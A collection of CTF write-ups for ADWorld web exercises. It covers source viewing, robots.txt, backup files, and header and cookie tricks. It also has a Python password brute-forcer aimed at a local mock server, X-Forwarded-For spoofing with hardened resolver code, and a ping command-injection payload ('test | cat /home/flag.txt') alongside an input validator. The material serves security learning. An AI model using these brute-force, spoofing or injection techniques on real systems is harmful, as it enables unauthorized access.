Adworld Ctf Web Exercises


ADWorld CTF Web Exercise Area Writeups


ADWorld CTF is an online Chinese competition platform that gives users a series of challenges in the categories misc, pwn, web, reverse, crypto and mobile. Each category has two groups of challenges: the exercise area and the challenge area.



The challenge name tells us to look at the source code. The page blocks the usual right-click route to the source, so we prepend view-source: to the URL instead. The flag sits in a commented-out line of the source.



robots.txt lists a PHP file named f1ag_1s_h3re.php. A Disallow entry only asks well-behaved crawlers to stay away; it hides nothing from a human reading the file. Requesting f1ag_1s_h3re.php presents the flag.



When we open the challenge the first page mentions index.php, so we can assume we need a backup copy of that file. Navigating to index.php.bak prompts a download. The file can be opened in a text editor or with cat in a terminal, and it contains the flag.


When we proxy the request through Burp we see a cookie in the request header that says look-here=Cookie.php. Requesting that PHP file tells us to look at the HTTP response, and the response carries a header named flag whose value is the flag.



The front page gives us a button labelled flag that cannot be clicked. Inspecting the source shows the button carries the disabled attribute. Removing disabled in the browser's element inspector makes the button clickable, and clicking it gives the flag. The attribute only lives in the client's copy of the page, so it never stops anyone who can edit the DOM or send the request by hand.



We are presented with a login page. When we try test:test we get a message saying please log in as admin. The page source says maybe you need a dictionary, which tells us the admin password has to be brute-forced from a wordlist.

To brute-force the password we send the login request to Burp Intruder, which replays it many times with different values. In the Positions tab we set the username to admin and mark the password field as the only payload position. In the Payloads tab, choose Load list and pick common.lst from the wordlists directory that ships with Kali Linux.

The brute force takes a while because the community edition of Burp throttles Intruder requests, but eventually it finds the password 123456. The successful attempt stands out in the results table because its response no longer contains the please log in as admin message, so sorting by response length or status is the quickest way to spot it.
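Because community Burp throttles Intruder, a few lines of Python do the same job at full speed. The following is an added example, not code from the original writeup or from ADWorld: it stands up a constructed stand-in login server on localhost (accepting only admin:123456 and otherwise returning the please log in as admin message seen above, with a placeholder flag string) and runs a Sniper-style loop over a short constructed wordlist. Success is detected the same way as in Burp, by the failure message disappearing from the response. Against the real challenge you would point it at the challenge URL and feed it common.lst.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the challenge's login page (not the real ADWorld
# server): only admin:123456 is accepted; everything else gets the failure
# message quoted in the writeup. The flag text is a placeholder.
VALID_USER, VALID_PASS = "admin", "123456"
FAIL_MSG = "please log in as admin"
FLAG_PLACEHOLDER = "flag{placeholder}"


class FakeLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pwd = form.get("password", [""])[0]
        body = FLAG_PLACEHOLDER if (user, pwd) == (VALID_USER, VALID_PASS) else FAIL_MSG
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_server():
    """Bind the stand-in login server on a free localhost port; returns (server, login URL)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/login"


def try_login(url, username, password):
    """One form POST, exactly what Intruder replays for each payload."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    with urllib.request.urlopen(url, data=data, timeout=5) as resp:
        return resp.read().decode()


def brute_force(url, username, wordlist, fail_marker=FAIL_MSG):
    """Replay the login once per candidate (Intruder Sniper mode on the
    password position). The hit is the first response that no longer
    contains the failure message. Returns (password, body) or (None, None)."""
    for candidate in wordlist:
        body = try_login(url, username, candidate)
        if fail_marker not in body:
            return candidate, body
    return None, None


# A handful of entries in the style of common.lst, constructed so the demo runs offline.
SAMPLE_WORDLIST = ["password", "admin", "letmein", "123456", "qwerty"]

if __name__ == "__main__":
    server, url = start_fake_server()
    try:
        print(brute_force(url, "admin", SAMPLE_WORDLIST))
    finally:
        server.shutdown()
```

Matching on the failure text rather than on the HTTP status is deliberate: many login pages, this challenge included, answer 200 either way, so status alone tells you nothing.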



The title of this challenge points to the X-Forwarded-For (XFF) header. A proxy or load balancer adds this header to pass along the IP address of the original client; without it the web server would see only the proxy's address on every request, which makes it hard to attribute a request to a particular client or to block an abusive one. The catch is that XFF is just another request header: the client can set it too, and a proxy normally passes along whatever was already there. An application that trusts the header for access control can therefore be fooled by anyone who writes the expected value into it themselves, which is exactly what this challenge expects us to do.

The XFF header matters for this challenge because the front page of the site shows an IP address, which we can assume has to go into that header. The IP given is

Adding an X-Forwarded-For header with the value of to the request brings us to a page that says

To get the flag we need to add both the X-Forwarded-For header and a Referer header with the value
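The server-side mistake this challenge models is resolving the client address from X-Forwarded-For blindly. The following is an added example, not code from the writeup or from the challenge (whose PHP source is not shown): it contrasts the naive lookup with one that walks the chain from the right and only believes the header when the connection actually came from our own proxy. All addresses are constructed from the RFC 5737 documentation ranges; the challenge's real IP and Referer values are not reproduced here. Referer is not handled separately because the point is identical: it is client-supplied text.

```python
import ipaddress

# Constructed: the address of our own reverse proxy (RFC 5737 documentation range).
TRUSTED_PROXIES = {ipaddress.ip_address("192.0.2.10")}


def client_ip_naive(headers, remote_addr):
    """The pattern the challenge relies on: take the first XFF value as the
    client address. That value is whatever the client chose to send."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(headers, remote_addr, trusted=TRUSTED_PROXIES):
    """Believe XFF only if the TCP peer is one of our proxies, then walk the
    chain from the right (the hop our proxy appended) and stop at the first
    address that is not a trusted proxy. Values a client prepended are never
    reached; an unparseable value falls back to the socket address."""
    if ipaddress.ip_address(remote_addr) not in trusted:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr
        if addr not in trusted:
            return str(addr)
    return remote_addr


def gate(headers, remote_addr, allowed_ip, resolver=client_ip_naive):
    """The challenge's check: is the request 'from' the one allowed address?"""
    return resolver(headers, remote_addr) == allowed_ip


if __name__ == "__main__":
    # Constructed scenario: the allowed address is 198.51.100.5, an attacker at
    # 203.0.113.77 connects directly and forges the header.
    forged = {"X-Forwarded-For": "198.51.100.5", "Referer": "http://example.invalid/"}
    print("naive:", gate(forged, "203.0.113.77", "198.51.100.5"))
    print("hardened:", gate(forged, "203.0.113.77", "198.51.100.5", client_ip_hardened))
```

The rightmost-untrusted walk is the part people get wrong: taking the last value is just as forgeable when there is no proxy in front at all, and taking the first value is forgeable even when there is one.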



We are brought to a web page with an input box and a button that executes whatever is in the box. It is intended as a ping utility: you enter an IP address and the server pings it. Entering the word "test" reveals the command being run: ping -c 3 test.

Testing the input further we can enter test | ls. This returns the file index.php, which tells us the input is spliced into a shell command without any sanitisation: the pipe hands whatever follows it to the shell, so we can run arbitrary commands on the server. Listing each directory under the root, test | ls /home shows a flag.txt, and test | cat /home/flag.txt prints the flag.
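The challenge's PHP source is not shown, so the following is an added example in Python, not the challenge's own code, that models what the observed command line implies and puts the fix beside it: a vulnerable builder that splices the input into a shell string, a tokeniser that makes the injected pipeline visible, and a hardened path that allow-lists a single IP literal or RFC 1123 hostname and builds an argv list that no shell ever parses. The validator handles the edge cases that matter (metacharacters, whitespace, embedded newlines, leading hyphens).

```python
import ipaddress
import re
import shlex

# One RFC 1123 hostname label: letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def vulnerable_command(user_input):
    """What the ping page appears to do: splice the input into a shell string.
    Returns the string handed to the shell; '|', ';', '$(...)' all survive."""
    return f"ping -c 3 {user_input}"


def shell_words(command):
    """Tokenise the way /bin/sh would (pipes and other punctuation become
    their own tokens), to show where the injected command begins."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def is_valid_target(user_input):
    """Allow-list: exactly one IPv4/IPv6 literal or one hostname. Anything
    else (shell metacharacters, spaces, newlines) is rejected outright."""
    try:
        ipaddress.ip_address(user_input)
        return True
    except ValueError:
        pass
    if not user_input or len(user_input) > 253 or user_input.endswith("."):
        return False
    # fullmatch (not match) so a trailing newline cannot sneak past '$'.
    return all(HOSTNAME_LABEL.fullmatch(label) for label in user_input.split("."))


def hardened_argv(user_input):
    """Validate, then build an argv list for subprocess.run(..., shell=False).
    With no shell in the path, even a metacharacter that somehow got through
    would be a literal hostname argument to ping, not a second command."""
    if not is_valid_target(user_input):
        raise ValueError(f"refusing to ping {user_input!r}")
    return ["ping", "-c", "3", user_input]


if __name__ == "__main__":
    payload = "test | cat /home/flag.txt"   # the writeup's final input
    print(vulnerable_command(payload))
    print(shell_words(vulnerable_command(payload)))
    print(hardened_argv("192.0.2.1"))
    try:
        hardened_argv(payload)
    except ValueError as e:
        print(e)
```

The argv list is the real fix; the allow-list is defence in depth. Escaping with shlex.quote and keeping shell=True would also work, but it leaves you one forgotten call away from the original bug.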